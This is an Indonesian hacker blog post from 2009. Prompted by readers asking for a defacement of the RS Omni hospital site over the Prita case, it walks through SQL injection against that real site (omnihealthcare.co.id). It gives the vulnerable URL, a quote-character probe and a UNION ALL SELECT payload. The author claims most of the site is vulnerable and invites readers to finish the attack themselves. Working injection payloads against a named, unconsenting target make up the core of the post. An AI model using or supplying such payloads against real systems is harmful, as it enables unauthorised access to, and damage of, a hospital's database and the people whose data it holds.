MS Access Injection: omnihealthcare.co.id


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Wednesday, June 3rd, 2009
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


Ketika kasus Bu Prita mencuat dan berbagai pihak memberikan dukungannya, saya didesak (duh, sampai sesak nafas rasanya ^_^) oleh request yang berdatangan melalui Members Area untuk memberikan dukungan berupa deface terhadap situs RS Omni.

Oke lah, agar tidak ada lagi yang mengirimkan request serupa, berikut beberapa info kecil terhadap celah-celah keamanan di website Rs Omni (omnihealthcare.co.id). Hampir semua area Vulnerable. Saya ambil contoh satu URL saja yach ^_*

http://www.omnihealthcare.co.id/acara_detil.asp?kode=5

Tambahkan tanda ‘ di belakang kode:

http://www.omnihealthcare.co.id/acara_detil.asp?kode=5′

Hasilnya:

 

{image: ODBC Error}

ODBC Error

Tuch khan kelihatan, ternyata cuma pakai MS Access.

Selanjutnya…

http://www.omnihealthcare.co.id/acara_detil.asp?kode=5+AND+1=0+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9+from+acara#

Hasilnya:

{image: Area output injeksi}

Area output injeksi

Hmm.. tinggal selangkah lagi nich.. bisa berantakan nich Databasenya. Untung saya orang baik-baik yang tidak suka merusak hehehe… :D —> FITNAH!

Silahkan (sebaiknya jangan dech >’_'<) diteruskan sendiri.. d['_']b Kalau nggak ngerti, bisa pakai rumus sakti berikut:

http://www.google.com/search?q=”Ms+Access+Injection”

Selamat belajar ;)

 


//E.O.F